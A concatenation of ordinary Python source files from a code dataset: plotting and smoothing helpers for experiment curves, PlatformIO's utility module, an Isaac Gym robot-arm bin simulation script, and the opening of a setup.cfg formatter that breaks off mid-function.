for i in range(len(all_data)):
c = get_color_by_lable(labels[i], i)
if ignore_zero:
mean, upper, lower = calculate_avg_ignoring_zero(all_data[i], exp_smooth=exp_smooth)
else:
mean, upper, lower = calculate_avg_default(all_data[i], exp_smooth=exp_smooth)
x = np.linspace(1, len(mean), len(mean))
canvas.plot(x, mean, label=labels[i], color=c)
canvas.fill_between(x, upper, lower, facecolor=c, alpha=0.3)
curve = mean[range_x[0]-1: range_x[1]]
auc[i] = np.sum(curve[len(curve)//2:] - range_y[0])
print("All auc =", auc)
print("All lr =", labels)
best_i = np.argmax(auc) if best == "largeAUC" else np.argmin(auc)
mean, upper, lower = calculate_avg_default(all_data[best_i], exp_smooth=exp_smooth)
print("Best setting =", auc[best_i], labels[best_i])
return mean, upper, lower, labels[best_i]
def calculate_avg_ignoring_zero(data, exp_smooth=None):
if exp_smooth is not None:
data_temp = []
for i in data:
zero_idx = np.where(i == 0)[0]
if len(zero_idx) == 0:
data_temp.append(i)
else:
data_temp.append(i[:zero_idx[0]])
data_temp = np.array(data_temp)
data = exponential_smooth(data_temp, beta=exp_smooth)
max_len = data.shape[1]
num_run = data.shape[0]
done = False
i = 0
mean = []
ste = []
while i < max_len and not done:
bits = data[:, i]
count_nonzero = np.where(bits!=0)[0]
if len(count_nonzero) < (num_run * 0.5):
done = True
else:
mean.append(np.sum(bits[count_nonzero]) / len(count_nonzero))
ste.append(np.abs(np.std(bits[count_nonzero])) / np.sqrt(len(count_nonzero)))
i += 1
mean = np.array(mean)
ste = np.array(ste)
upper = mean + ste
lower = mean - ste
return mean, upper, lower
def calculate_avg_default(data, exp_smooth=None):
if exp_smooth is not None:
data = exponential_smooth(data, beta=exp_smooth)
mean = data.mean(axis=0)
ste = np.abs(np.std(data, axis=0)) / np.sqrt(len(data))
upper = mean + ste
lower = mean - ste
return mean, upper, lower
def exponential_smooth(all_data, beta):
max_len = np.max(np.array([len(i) for i in all_data]))
all_row = np.zeros((len(all_data), max_len))
for i in range(len(all_data)):
data = all_data[i]
J = 0
new_data = np.zeros(len(data))
for idx in range(len(data)):
J *= (1-beta)
J += beta
rate = beta / J
if idx == 0:
new_data[idx] = data[idx] * rate
else:
new_data[idx] = data[idx] * rate + new_data[idx - 1] * (1 - rate)
all_row[i, :len(new_data)] = new_data
return all_row
|
the-stack_106_13018
|
# Copyright (c) 2014-present PlatformIO <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import math
import os
import platform
import re
import socket
import sys
import time
from contextlib import contextmanager
from functools import wraps
from glob import glob
import click
import requests
from platformio import __apiurl__, __version__, exception
from platformio.commands import PlatformioCLI
from platformio.compat import PY2, WINDOWS
from platformio.fs import cd # pylint: disable=unused-import
from platformio.fs import load_json # pylint: disable=unused-import
from platformio.fs import rmtree as rmtree_ # pylint: disable=unused-import
from platformio.proc import exec_command # pylint: disable=unused-import
from platformio.proc import is_ci # pylint: disable=unused-import
# KEEP unused imports for backward compatibility with PIO Core 3.0 API
class memoized(object):
def __init__(self, expire=0):
expire = str(expire)
if expire.isdigit():
expire = "%ss" % int((int(expire) / 1000))
tdmap = {"s": 1, "m": 60, "h": 3600, "d": 86400}
assert expire.endswith(tuple(tdmap))
self.expire = int(tdmap[expire[-1]] * int(expire[:-1]))
self.cache = {}
def __call__(self, func):
@wraps(func)
def wrapper(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in self.cache or (
self.expire > 0 and self.cache[key][0] < time.time() - self.expire
):
self.cache[key] = (time.time(), func(*args, **kwargs))
return self.cache[key][1]
wrapper.reset = self._reset
return wrapper
def _reset(self):
self.cache.clear()
class throttle(object):
def __init__(self, threshhold):
self.threshhold = threshhold # milliseconds
self.last = 0
def __call__(self, func):
@wraps(func)
def wrapper(*args, **kwargs):
diff = int(round((time.time() - self.last) * 1000))
if diff < self.threshhold:
time.sleep((self.threshhold - diff) * 0.001)
self.last = time.time()
return func(*args, **kwargs)
return wrapper
def singleton(cls):
""" From PEP-318 http://www.python.org/dev/peps/pep-0318/#examples """
_instances = {}
def get_instance(*args, **kwargs):
if cls not in _instances:
_instances[cls] = cls(*args, **kwargs)
return _instances[cls]
return get_instance
@contextmanager
def capture_std_streams(stdout, stderr=None):
_stdout = sys.stdout
_stderr = sys.stderr
sys.stdout = stdout
sys.stderr = stderr or stdout
yield
sys.stdout = _stdout
sys.stderr = _stderr
def get_systype():
type_ = platform.system().lower()
arch = platform.machine().lower()
if type_ == "windows":
arch = "amd64" if platform.architecture()[0] == "64bit" else "x86"
return "%s_%s" % (type_, arch) if arch else type_
def pioversion_to_intstr():
vermatch = re.match(r"^([\d\.]+)", __version__)
assert vermatch
return [int(i) for i in vermatch.group(1).split(".")[:3]]
def change_filemtime(path, mtime):
os.utime(path, (mtime, mtime))
def get_serial_ports(filter_hwid=False):
try:
# pylint: disable=import-outside-toplevel
from serial.tools.list_ports import comports
except ImportError:
raise exception.GetSerialPortsError(os.name)
result = []
for p, d, h in comports():
if not p:
continue
if WINDOWS and PY2:
try:
# pylint: disable=undefined-variable
d = unicode(d, errors="ignore")
except TypeError:
pass
if not filter_hwid or "VID:PID" in h:
result.append({"port": p, "description": d, "hwid": h})
if filter_hwid:
return result
# fix for PySerial
if not result and "darwin" in get_systype():
for p in glob("/dev/tty.*"):
result.append({"port": p, "description": "n/a", "hwid": "n/a"})
return result
# Backward compatibility for PIO Core <3.5
get_serialports = get_serial_ports
def get_logical_devices():
items = []
if WINDOWS:
try:
result = exec_command(
["wmic", "logicaldisk", "get", "name,VolumeName"]
).get("out", "")
devicenamere = re.compile(r"^([A-Z]{1}\:)\s*(\S+)?")
for line in result.split("\n"):
match = devicenamere.match(line.strip())
if not match:
continue
items.append({"path": match.group(1) + "\\", "name": match.group(2)})
return items
except WindowsError: # pylint: disable=undefined-variable
pass
# try "fsutil"
result = exec_command(["fsutil", "fsinfo", "drives"]).get("out", "")
for device in re.findall(r"[A-Z]:\\", result):
items.append({"path": device, "name": None})
return items
result = exec_command(["df"]).get("out")
devicenamere = re.compile(r"^/.+\d+\%\s+([a-z\d\-_/]+)$", flags=re.I)
for line in result.split("\n"):
match = devicenamere.match(line.strip())
if not match:
continue
items.append({"path": match.group(1), "name": os.path.basename(match.group(1))})
return items
def get_mdns_services():
# pylint: disable=import-outside-toplevel
try:
import zeroconf
except ImportError:
from site import addsitedir
from platformio.managers.core import get_core_package_dir
contrib_pysite_dir = get_core_package_dir("contrib-pysite")
addsitedir(contrib_pysite_dir)
sys.path.insert(0, contrib_pysite_dir)
import zeroconf # pylint: disable=import-outside-toplevel
class mDNSListener(object):
def __init__(self):
self._zc = zeroconf.Zeroconf(interfaces=zeroconf.InterfaceChoice.All)
self._found_types = []
self._found_services = []
def __enter__(self):
zeroconf.ServiceBrowser(self._zc, "_services._dns-sd._udp.local.", self)
return self
def __exit__(self, etype, value, traceback):
self._zc.close()
def remove_service(self, zc, type_, name):
pass
def add_service(self, zc, type_, name):
try:
assert zeroconf.service_type_name(name)
assert str(name)
except (AssertionError, UnicodeError, zeroconf.BadTypeInNameException):
return
if name not in self._found_types:
self._found_types.append(name)
zeroconf.ServiceBrowser(self._zc, name, self)
if type_ in self._found_types:
s = zc.get_service_info(type_, name)
if s:
self._found_services.append(s)
def get_services(self):
return self._found_services
items = []
with mDNSListener() as mdns:
time.sleep(3)
for service in mdns.get_services():
properties = None
if service.properties:
try:
properties = {
k.decode("utf8"): v.decode("utf8")
if isinstance(v, bytes)
else v
for k, v in service.properties.items()
}
json.dumps(properties)
except UnicodeDecodeError:
properties = None
items.append(
{
"type": service.type,
"name": service.name,
"ip": ".".join(
[
str(c if isinstance(c, int) else ord(c))
for c in service.address
]
),
"port": service.port,
"properties": properties,
}
)
return items
def get_request_defheaders():
data = (__version__, int(is_ci()), requests.utils.default_user_agent())
return {"User-Agent": "PlatformIO/%s CI/%d %s" % data}
@memoized(expire="60s")
def _api_request_session():
return requests.Session()
@throttle(500)
def _get_api_result(
url, params=None, data=None, auth=None # pylint: disable=too-many-branches
):
from platformio.app import get_setting # pylint: disable=import-outside-toplevel
result = {}
r = None
verify_ssl = sys.version_info >= (2, 7, 9)
headers = get_request_defheaders()
if not url.startswith("http"):
url = __apiurl__ + url
if not get_setting("strict_ssl"):
url = url.replace("https://", "http://")
try:
if data:
r = _api_request_session().post(
url,
params=params,
data=data,
headers=headers,
auth=auth,
verify=verify_ssl,
)
else:
r = _api_request_session().get(
url, params=params, headers=headers, auth=auth, verify=verify_ssl
)
result = r.json()
r.raise_for_status()
return r.text
except requests.exceptions.HTTPError as e:
if result and "message" in result:
raise exception.APIRequestError(result["message"])
if result and "errors" in result:
raise exception.APIRequestError(result["errors"][0]["title"])
raise exception.APIRequestError(e)
except ValueError:
raise exception.APIRequestError("Invalid response: %s" % r.text.encode("utf-8"))
finally:
if r:
r.close()
return None
def get_api_result(url, params=None, data=None, auth=None, cache_valid=None):
from platformio.app import ContentCache # pylint: disable=import-outside-toplevel
total = 0
max_retries = 5
cache_key = (
ContentCache.key_from_args(url, params, data, auth) if cache_valid else None
)
while total < max_retries:
try:
with ContentCache() as cc:
if cache_key:
result = cc.get(cache_key)
if result is not None:
return json.loads(result)
# check internet before and resolve issue with 60 seconds timeout
internet_on(raise_exception=True)
result = _get_api_result(url, params, data)
if cache_valid:
with ContentCache() as cc:
cc.set(cache_key, result, cache_valid)
return json.loads(result)
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as e:
total += 1
if not PlatformioCLI.in_silence():
click.secho(
"[API] ConnectionError: {0} (incremented retry: max={1}, "
"total={2})".format(e, max_retries, total),
fg="yellow",
)
time.sleep(2 * total)
raise exception.APIRequestError(
"Could not connect to PlatformIO API Service. Please try later."
)
PING_INTERNET_IPS = [
"192.30.253.113", # github.com
"78.46.220.20", # dl.platformio.org
]
@memoized(expire="5s")
def _internet_on():
timeout = 2
socket.setdefaulttimeout(timeout)
for ip in PING_INTERNET_IPS:
try:
if os.getenv("HTTP_PROXY", os.getenv("HTTPS_PROXY")):
requests.get("http://%s" % ip, allow_redirects=False, timeout=timeout)
else:
socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect((ip, 80))
return True
except: # pylint: disable=bare-except
pass
return False
def internet_on(raise_exception=False):
result = _internet_on()
if raise_exception and not result:
raise exception.InternetIsOffline()
return result
def pepver_to_semver(pepver):
return re.sub(r"(\.\d+)\.?(dev|a|b|rc|post)", r"\1-\2.", pepver, 1)
def items_to_list(items):
if not isinstance(items, list):
items = [i.strip() for i in items.split(",")]
return [i.lower() for i in items if i]
def items_in_list(needle, haystack):
needle = items_to_list(needle)
haystack = items_to_list(haystack)
if "*" in needle or "*" in haystack:
return True
return set(needle) & set(haystack)
def parse_date(datestr):
if "T" in datestr and "Z" in datestr:
return time.strptime(datestr, "%Y-%m-%dT%H:%M:%SZ")
return time.strptime(datestr)
def merge_dicts(d1, d2, path=None):
if path is None:
path = []
for key in d2:
if key in d1 and isinstance(d1[key], dict) and isinstance(d2[key], dict):
merge_dicts(d1[key], d2[key], path + [str(key)])
else:
d1[key] = d2[key]
return d1
def print_labeled_bar(label, is_error=False, fg=None):
terminal_width, _ = click.get_terminal_size()
width = len(click.unstyle(label))
half_line = "=" * int((terminal_width - width - 2) / 2)
click.secho("%s %s %s" % (half_line, label, half_line), fg=fg, err=is_error)
def humanize_duration_time(duration):
if duration is None:
return duration
duration = duration * 1000
tokens = []
for multiplier in (3600000, 60000, 1000, 1):
fraction = math.floor(duration / multiplier)
tokens.append(int(round(duration) if multiplier == 1 else fraction))
duration -= fraction * multiplier
return "{:02d}:{:02d}:{:02d}.{:03d}".format(*tokens)
def get_original_version(version):
if version.count(".") != 2:
return None
_, raw = version.split(".")[:2]
if int(raw) <= 99:
return None
if int(raw) <= 9999:
return "%s.%s" % (raw[:-2], int(raw[-2:]))
return "%s.%s.%s" % (raw[:-4], int(raw[-4:-2]), int(raw[-2:]))
|
the-stack_106_13022
|
"""
Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
NVIDIA CORPORATION and its licensors retain all intellectual property
and proprietary rights in and to this software, related documentation
and any modifications thereto. Any use, reproduction, disclosure or
distribution of this software and related documentation without an express
license agreement from NVIDIA CORPORATION is strictly prohibited.
Kuka bin perfromance test
-------------------------------
Test simulation perfromance and stability of the robotic arm dealing with a set of complex objects in a bin.
"""
from __future__ import print_function, division, absolute_import
import os
import math
import numpy as np
from isaacgym import gymapi
from isaacgym import gymutil
from isaacgym import gymtorch
import matplotlib
import matplotlib.pyplot as plt
from PIL import Image as Im
from copy import copy
axes_geom = gymutil.AxesGeometry(0.1)
sphere_rot = gymapi.Quat.from_euler_zyx(0.5 * math.pi, 0, 0)
sphere_pose = gymapi.Transform(r=sphere_rot)
sphere_geom = gymutil.WireframeSphereGeometry(0.03, 12, 12, sphere_pose, color=(1, 0, 0))
colors = [gymapi.Vec3(1.0, 0.0, 0.0),
gymapi.Vec3(1.0, 127.0/255.0, 0.0),
gymapi.Vec3(1.0, 1.0, 0.0),
gymapi.Vec3(0.0, 1.0, 0.0),
gymapi.Vec3(0.0, 0.0, 1.0),
gymapi.Vec3(39.0/255.0, 0.0, 51.0/255.0),
gymapi.Vec3(139.0/255.0, 0.0, 1.0)]
tray_color = gymapi.Vec3(0.24, 0.35, 0.8)
banana_color = gymapi.Vec3(0.85, 0.88, 0.2)
brick_color = gymapi.Vec3(0.9, 0.5, 0.1)
# initialize gym
gym = gymapi.acquire_gym()
# parse arguments
args = gymutil.parse_arguments(
description="Kuka Bin Test",
custom_parameters=[
{"name": "--num_envs", "type": int, "default": 1, "help": "Number of environments to create"},
{"name": "--num_objects", "type": int, "default": 1, "help": "Number of objects in the bin"},
{"name": "--object_type", "type": int, "default": 0, "help": "Type of bjects to place in the bin: 0 - box, 1 - meat can, 2 - banana, 3 - mug, 4 - brick, 5 - random"}])
num_envs = args.num_envs
num_objects = args.num_objects
box_size = 0.05
# configure sim
sim_type = args.physics_engine
sim_params = gymapi.SimParams()
if sim_type == gymapi.SIM_FLEX:
sim_params.substeps = 4
sim_params.flex.solver_type = 5
sim_params.flex.num_outer_iterations = 4
sim_params.flex.num_inner_iterations = 20
sim_params.flex.relaxation = 0.75
sim_params.flex.warm_start = 0.8
elif sim_type == gymapi.SIM_PHYSX:
sim_params.substeps = 2
sim_params.physx.solver_type = 1
sim_params.physx.num_position_iterations = 25
sim_params.physx.num_velocity_iterations = 0
sim_params.physx.num_threads = args.num_threads
sim_params.physx.use_gpu = args.use_gpu
sim_params.physx.rest_offset = 0.001
sim_params.up_axis = gymapi.UP_AXIS_Y
#sim_params.gravity = gymapi.Vec3(0.0, -9.81, 0.0)
sim_params.use_gpu_pipeline = False
if args.use_gpu_pipeline:
print("WARNING: Forcing CPU pipeline.")
sim = gym.create_sim(args.compute_device_id, args.graphics_device_id, sim_type, sim_params)
if sim is None:
print("*** Failed to create sim")
quit()
# add ground plane
plane_params = gymapi.PlaneParams()
gym.add_ground(sim, plane_params)
# create viewer
viewer = gym.create_viewer(sim, gymapi.CameraProperties())
if viewer is None:
print("*** Failed to create viewer")
quit()
# load assets
asset_root = "../assets"
table_dims = gymapi.Vec3(0.6, 0.2, 1.0)
base_dims = gymapi.Vec3(0.2, 0.2, 0.2)
ur10_pose = gymapi.Transform()
ur10_pose.p = gymapi.Vec3(0.0, 0.2, 0.0)
ur10_pose.r = gymapi.Quat.from_euler_zyx(-0.5 * math.pi, 0, 0)
asset_options = gymapi.AssetOptions()
asset_options.armature = 0.001
asset_options.fix_base_link = True
asset_options.thickness = 0.002
asset_options.mesh_normal_mode = gymapi.COMPUTE_PER_VERTEX
table_pose = gymapi.Transform()
table_pose.p = gymapi.Vec3(0.5, 0.5 * table_dims.y + 0.001, 0.0)
base_pose = gymapi.Transform()
base_pose.p = gymapi.Vec3(0.0, 0.5 * base_dims.y, 0.0)
bin_pose = gymapi.Transform()
bin_pose.r = gymapi.Quat(-0.707107, 0.0, 0.0, 0.707107)
object_pose = gymapi.Transform()
table_asset = gym.create_box(sim, table_dims.x, table_dims.y, table_dims.z, asset_options)
# load assets of objects in a bin
asset_options.fix_base_link = False
can_asset_file = "urdf/ycb/010_potted_meat_can/010_potted_meat_can.urdf"
banana_asset_file = "urdf/ycb/011_banana/011_banana.urdf"
mug_asset_file = "urdf/ycb/025_mug/025_mug.urdf"
brick_asset_file = "urdf/ycb/061_foam_brick/061_foam_brick.urdf"
object_files = []
object_files.append(can_asset_file)
object_files.append(banana_asset_file)
object_files.append(mug_asset_file)
object_files.append(object_files)
object_assets = []
object_assets.append(gym.create_box(sim, box_size, box_size, box_size, asset_options))
object_assets.append(gym.load_asset(sim, asset_root, can_asset_file, asset_options))
object_assets.append(gym.load_asset(sim, asset_root, banana_asset_file, asset_options))
object_assets.append(gym.load_asset(sim, asset_root, mug_asset_file, asset_options))
object_assets.append(gym.load_asset(sim, asset_root, brick_asset_file, asset_options))
spawn_height = gymapi.Vec3(0.0, 0.3, 0.0)
# load bin asset
bin_asset_file = "robot_package/base/urdf/base.urdf"
print("Loading asset '%s' from '%s'" % (bin_asset_file, asset_root))
bin_asset = gym.load_asset(sim, asset_root, bin_asset_file, asset_options)
corner = table_pose.p - table_dims * 0.5
asset_root = "../assets"
ur10_asset_file = "ur_robotics/ur5_gripper/ur5_gripper.urdf"
asset_options.fix_base_link = True
asset_options.flip_visual_attachments = True
asset_options.collapse_fixed_joints = True
asset_options.use_mesh_materials = True
if sim_type == gymapi.SIM_FLEX:
asset_options.max_angular_velocity = 40.
print("Loading asset '%s' from '%s'" % (ur10_asset_file, asset_root))
ur10_asset = gym.load_asset(sim, asset_root, ur10_asset_file, asset_options)
# set up the env grid
spacing = 1.5
env_lower = gymapi.Vec3(-spacing, 0.0, -spacing)
env_upper = gymapi.Vec3(spacing, spacing, spacing)
# cache some common handles for later use
envs = []
tray_handles = []
object_handles = []
# Attractors setup
ur10_attractors = ["robotiq_85_left_finger_tip_link"]
# attractors_offsets = [gymapi.Transform(), gymapi.Transform(), gymapi.Transform(), gymapi.Transform(), gymapi.Transform()]
# # Coordinates to offset attractors to tips of fingers
# # thumb
# attractors_offsets[1].p = gymapi.Vec3(0.07, 0.01, 0)
# attractors_offsets[1].r = gymapi.Quat(0.0, 0.0, 0.216433, 0.976297)
# # index, middle and ring
# for i in range(2, 5):
# attractors_offsets[i].p = gymapi.Vec3(0.055, 0.015, 0)
# attractors_offsets[i].r = gymapi.Quat(0.0, 0.0, 0.216433, 0.976297)
attractor_handles = {}
print("Creating %d environments" % num_envs)
num_per_row = int(math.sqrt(num_envs))
base_poses = []
for i in range(num_envs):
# create env
env = gym.create_env(sim, env_lower, env_upper, num_per_row)
envs.append(env)
table_handle = gym.create_actor(env, table_asset, table_pose, "table", i, 0)
base_handle = gym.create_actor(env, table_asset, base_pose, "base", i, 0)
x = corner.x + table_dims.x * 0.5
y = table_dims.y + box_size + 0.01
z = corner.z + table_dims.z * 0.5
bin_pose.p = gymapi.Vec3(x, y, z)
tray_handles.append(gym.create_actor(env, bin_asset, bin_pose, "bin", i, 0))
gym.set_rigid_body_color(env, tray_handles[-1], 0, gymapi.MESH_VISUAL_AND_COLLISION, tray_color)
for j in range(num_objects):
x = corner.x + table_dims.x * 0.5 + np.random.rand() * 0.35 - 0.2
y = table_dims.y + box_size * 1.2 * j - 0.05
z = corner.z + table_dims.z * 0.5 + np.random.rand() * 0.3 - 0.15
object_pose.p = gymapi.Vec3(x, y, z) + spawn_height
object_asset = object_assets[0]
if args.object_type >= 5:
object_asset = object_assets[np.random.randint(len(object_assets))]
else:
object_asset = object_assets[args.object_type]
object_handles.append(gym.create_actor(env, object_asset, object_pose, "object" + str(j), i, 0))
if args.object_type == 2:
color = gymapi.Vec3(banana_color.x + np.random.rand()*0.1, banana_color.y + np.random.rand()*0.05, banana_color.z)
gym.set_rigid_body_color(env, object_handles[-1], 0, gymapi.MESH_VISUAL_AND_COLLISION, color)
elif args.object_type == 4:
color = gymapi.Vec3(brick_color.x + np.random.rand()*0.1, brick_color.y + np.random.rand()*0.04, brick_color.z + np.random.rand()*0.05)
gym.set_rigid_body_color(env, object_handles[-1], 0, gymapi.MESH_VISUAL_AND_COLLISION, color)
else:
gym.set_rigid_body_color(env, object_handles[-1], 0, gymapi.MESH_VISUAL_AND_COLLISION, colors[j % len(colors)])
# add ur10
ur10_handle = gym.create_actor(env, ur10_asset, ur10_pose, "ur10", i, 1)
ur10_handles = []
attractor_handles[i] = []
ur10_body_dict = gym.get_actor_rigid_body_dict(env, ur10_handle)
ur10_props = gym.get_actor_rigid_body_states(env, ur10_handle, gymapi.STATE_POS)
#my attractors
for j, body in enumerate(ur10_attractors):
attractor_properties = gymapi.AttractorProperties()
attractor_properties.stiffness = 1e6
attractor_properties.damping = 5e2
body_handle = gym.find_actor_rigid_body_handle(env, ur10_handle, body)
attractor_properties.target = ur10_props['pose'][:][ur10_body_dict[body]]
attractor_properties.target.p.y -= 0.15
# By Default, offset pose is set to origin, so no need to set it
# if j > 0:
# attractor_properties.offset = attractors_offsets[j]
base_poses.append(attractor_properties.target)
if j == 0:
# make attractor in all axes
attractor_properties.axes = gymapi.AXIS_ALL
else:
# make attractor in Translation only
attractor_properties.axes = gymapi.AXIS_TRANSLATION
# attractor_properties.target.p.z=0.1
attractor_properties.rigid_handle = body_handle
gymutil.draw_lines(axes_geom, gym, viewer, env, attractor_properties.target)
gymutil.draw_lines(sphere_geom, gym, viewer, env, attractor_properties.target)
attractor_handle = gym.create_rigid_body_attractor(env, attractor_properties)
attractor_handles[i].append(attractor_handle)
ur10_handles.append(ur10_handle)
# get joint limits and ranges for ur10
ur10_dof_props = gym.get_actor_dof_properties(envs[0], ur10_handles[0])
ur10_lower_limits = ur10_dof_props['lower']
ur10_upper_limits = ur10_dof_props['upper']
ur10_ranges = ur10_upper_limits - ur10_lower_limits
ur10_mids = 0.5 * (ur10_upper_limits + ur10_lower_limits)
ur10_num_dofs = len(ur10_dof_props)
# override default stiffness and damping values
ur10_dof_props['stiffness'].fill(100.0)
ur10_dof_props['damping'].fill(100.0)
# Set base to track pose zero to maintain posture
ur10_dof_props["driveMode"][0] = gymapi.DOF_MODE_POS
for env in envs:
gym.set_actor_dof_properties(env, ur10_handles[i], ur10_dof_props)
# a helper function to initialize all envs
def init():
for i in range(num_envs):
# set updated stiffness and damping properties
gym.set_actor_dof_properties(envs[i], ur10_handles[i], ur10_dof_props)
ur10_dof_states = gym.get_actor_dof_states(envs[i], ur10_handles[i], gymapi.STATE_NONE)
for j in range(ur10_num_dofs):
ur10_dof_states['pos'][j] = ur10_mids[j] - ur10_mids[j] * .5
gym.set_actor_dof_states(envs[i], ur10_handles[i], ur10_dof_states, gymapi.STATE_POS)
# pose.p.x = 0.2 * math.sin(1.5 * t - math.pi * float(i) / num_envs)
# pose.p.y = 0.7 + 0.1 * math.cos(2.5 * t - math.pi * float(i) / num_envs)
# pose.p.z = 0.2 * math.cos(1.5 * t - math.pi * float(i) / num_envs)gymapi.Vec3(0.6, 0.8, 0.0)
def update_ur10(t):
gym.clear_lines(viewer)
for i in range(num_envs):
for j in range(len(attractor_handles[i])):
attractor_properties = gym.get_attractor_properties(envs[i], attractor_handles[i][j])
attr_pose = copy(base_poses[j])
target_pose = gymapi.Transform()
sec = 5
target_pose.p = object_pose.p - spawn_height
attr_pose.p = attr_pose.p + (target_pose.p - attr_pose.p) * t / sec
if (t < sec):
gym.set_attractor_target(envs[i], attractor_handles[i][j], attr_pose)
gymutil.draw_lines(axes_geom, gym, viewer, envs[i], attr_pose)
gymutil.draw_lines(sphere_geom, gym, viewer, envs[i], attr_pose)
init()
next_ur10_update_time = 0.1
frame = 0
# Camera Sensor
camera_props = gymapi.CameraProperties()
camera_props.width = 1280
camera_props.height = 1280
camera_props.enable_tensors = True
camera_handle = gym.create_camera_sensor(env, camera_props)
transform = gymapi.Transform()
transform.p = gymapi.Vec3(1,1,1)
transform.r = gymapi.Quat.from_axis_angle(gymapi.Vec3(0,1,0), np.radians(45.0))
gym.set_camera_transform(camera_handle, env, transform)
debug_fig = plt.figure("debug")
while not gym.query_viewer_has_closed(viewer):
# check if we should update
t = gym.get_sim_time(sim)
if t >= next_ur10_update_time:
update_ur10(t)
next_ur10_update_time += 0.01
# step the physics
gym.simulate(sim)
gym.fetch_results(sim, True)
# for env in envs:
# gym.draw_env_rigid_contacts(viewer, env, colors[0], 0.5, True)
# step rendering
gym.step_graphics(sim)
# digest image
gym.render_all_camera_sensors(sim)
gym.start_access_image_tensors(sim)
camera_tensor = gym.get_camera_image_gpu_tensor(sim, envs[0], camera_handle, gymapi.IMAGE_COLOR)
torch_camera_tensor = gymtorch.wrap_tensor(camera_tensor)
cam_img = torch_camera_tensor.cpu().numpy()
cam_img = Im.fromarray(cam_img)
plt.imshow(cam_img)
plt.pause(1e-9)
debug_fig.clf()
gym.end_access_image_tensors(sim)
gym.draw_viewer(viewer, sim, False)
gym.sync_frame_time(sim)
frame = frame + 1
print("Done")
gym.destroy_viewer(viewer)
gym.destroy_sim(sim)
|
the-stack_106_13024
|
import argparse
import configparser
import glob
import io
import os.path
import re
from typing import Dict
from typing import List
from typing import Match
from typing import Optional
from typing import Sequence
from typing import Set
from typing import Tuple
from identify import identify
KEYS_ORDER: Tuple[Tuple[str, Tuple[str, ...]], ...] = (
(
'metadata', (
'name', 'version', 'description',
'long_description', 'long_description_content_type',
'url', 'author', 'author_email', 'license', 'license_file',
'platforms', 'classifiers',
),
),
(
'options', (
'packages', 'py_modules', 'install_requires', 'python_requires',
),
),
('options.sections.find', ('where', 'exclude', 'include')),
('options.entry_points', ('console_scripts',)),
('options.extras_require', ()),
('options.package_data', ()),
('options.exclude_package_data', ()),
)
LICENSE_TO_CLASSIFIER = {
'0BSD': 'License :: OSI Approved :: BSD License',
'AFL-3.0': 'License :: OSI Approved :: Academic Free License (AFL)',
'AGPL-3.0': 'License :: OSI Approved :: GNU Affero General Public License v3', # noqa: E501
'Apache-2.0': 'License :: OSI Approved :: Apache Software License',
'Artistic-2.0': 'License :: OSI Approved :: Artistic License',
'BSD-2-Clause': 'License :: OSI Approved :: BSD License',
'BSD-3-Clause': 'License :: OSI Approved :: BSD License',
'BSD-3-Clause-Clear': 'License :: OSI Approved :: BSD License',
'BSL-1.0': 'License :: OSI Approved :: Boost Software License 1.0 (BSL-1.0)', # noqa: E501
'CC0-1.0': 'License :: CC0 1.0 Universal (CC0 1.0) Public Domain Dedication', # noqa: E501
'EPL-1.0': 'License :: OSI Approved :: Eclipse Public License 1.0 (EPL-1.0)', # noqa: E501
'EPL-2.0': 'License :: OSI Approved :: Eclipse Public License 2.0 (EPL-2.0)', # noqa: E501
'EUPL-1.1': 'License :: OSI Approved :: European Union Public Licence 1.1 (EUPL 1.1)', # noqa: E501
'EUPL-1.2': 'License :: OSI Approved :: European Union Public Licence 1.2 (EUPL 1.2)', # noqa: E501
'GPL-2.0': 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)', # noqa: E501
'GPL-3.0': 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)', # noqa: E501
'ISC': 'License :: OSI Approved :: ISC License (ISCL)',
'LGPL-2.1': 'License :: OSI Approved :: GNU Lesser General Public License v2 (LGPLv2)', # noqa: E501
'LGPL-3.0': 'License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)', # noqa: E501
'MIT': 'License :: OSI Approved :: MIT License',
'MPL-2.0': 'License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)', # noqa: E501
'NCSA': 'License :: OSI Approved :: University of Illinois/NCSA Open Source License', # noqa: E501
'OFL-1.1': 'License :: OSI Approved :: SIL Open Font License 1.1 (OFL-1.1)', # noqa: E501
'PostgreSQL': 'License :: OSI Approved :: PostgreSQL License',
'UPL-1.0': 'License :: OSI Approved :: Universal Permissive License (UPL)',
'Zlib': 'License :: OSI Approved :: zlib/libpng License',
}
def _adjacent_filename(setup_cfg: str, filename: str) -> str:
return os.path.join(os.path.dirname(setup_cfg), filename)
GLOB_PART = re.compile(r'(\[[^]]+\]|.)')
def _case_insensitive_glob(s: str) -> str:
def cb(match: Match[str]) -> str:
match_s = match.group()
if len(match_s) == 1:
return f'[{match_s.upper()}{match_s.lower()}]'
else:
inner = ''.join(f'{c.upper()}{c.lower()}' for c in match_s[1:-1])
return f'[{inner}]'
return GLOB_PART.sub(cb, s)
def _first_file(setup_cfg: str, prefix: str) -> Optional[str]:
prefix = _case_insensitive_glob(prefix)
path = _adjacent_filename(setup_cfg, prefix)
for filename in glob.iglob(f'{path}*'):
return filename
else:
return None
def _py3_excluded(min_py3_version: Tuple[int, int]) -> Set[Tuple[int, int]]:
_, end = min_py3_version
return {(3, i) for i in range(end)}
def _format_python_requires(
minimum: Tuple[int, int],
excluded: Set[Tuple[int, int]],
) -> str:
return ', '.join((
f'>={_v(minimum)}', *(f'!={_v(v)}.*' for v in sorted(excluded)),
))
class UnknownVersionError(ValueError):
pass
def _to_ver(s: str) -> Tuple[int, int]:
parts = [part for part in s.split('.') if part != '*']
if len(parts) != 2:
raise UnknownVersionError()
else:
return int(parts[0]), int(parts[1])
def _v(x: Tuple[int, ...]) -> str:
return '.'.join(str(p) for p in x)
def _parse_python_requires(
python_requires: Optional[str],
) -> Tuple[Optional[Tuple[int, int]], Set[Tuple[int, int]]]:
minimum = None
excluded = set()
if python_requires:
for part in python_requires.split(','):
